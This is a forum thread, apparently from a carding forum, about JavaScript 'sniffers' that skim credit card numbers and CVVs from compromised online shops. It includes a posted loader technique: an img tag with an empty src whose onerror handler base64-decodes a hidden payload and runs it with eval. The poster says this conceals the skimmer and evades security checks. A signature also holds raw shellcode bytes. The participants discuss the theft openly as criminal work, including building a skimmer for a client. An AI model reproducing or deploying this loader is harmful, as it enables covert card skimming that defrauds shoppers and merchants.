Статья JS сниффер

Dron · 29.01.2025

Str0ng сказал(а):

What happens if I have a sniffer, and I want to know which data is from cards like cvv, cc, cv etc,
but there are many websites and they are all different ?

you need a sniffer that collect cc+cvv, also for this you need access to online shops on which you already install the sniffer itself

Str0ng · 29.01.2025

Hi, thanks friend, I was actually programming one, and I already finished it, it was for a private client, still thanks

)

weaver · 21.02.2025

Попался тут один трюк с onerror в теге img, который используется для сокрытия снифера цц

JavaScript:

<img
data-base64="ZnVuY3Rpb24gdGVzdDEoKXthbGVydCgnSGVsbG8gd29ybGQnKTsgfQ=="
onerror="(() => {
if (!window.__imgTriggered) {
window.__imgTriggered = true;
let imgElement = event.target;
let base64Data = imgElement.getAttribute('data-base64');
if (base64Data) {
    let decodedString = atob(base64Data);
    eval(decodedString); // Выполняем декодированную строку как код
    test1();
}} })()"
src="" />

1. Собственно в data-base64 кодируется payload (основная нагрузка , сам снифер)

в данном случае там закодирован следующий JS-код

JavaScript:

function test1(){alert('Hello world'); }

2. onerror событие позволяет обходить некоторые механизмы безопасности так как ему доверяют
3. это событие вызвается каждый раз т.к. нет картинки (и она не отображается) src="", код декодируется и вызывается функция test1();
4. eval(); тут в качестве примера, его можно заменить.

Статья JS сниффер

Dron

(L2) cache

Str0ng

(L3) cache

weaver

31 c0 bb ea 1b e6 77 66 b8 88 13 50 ff d3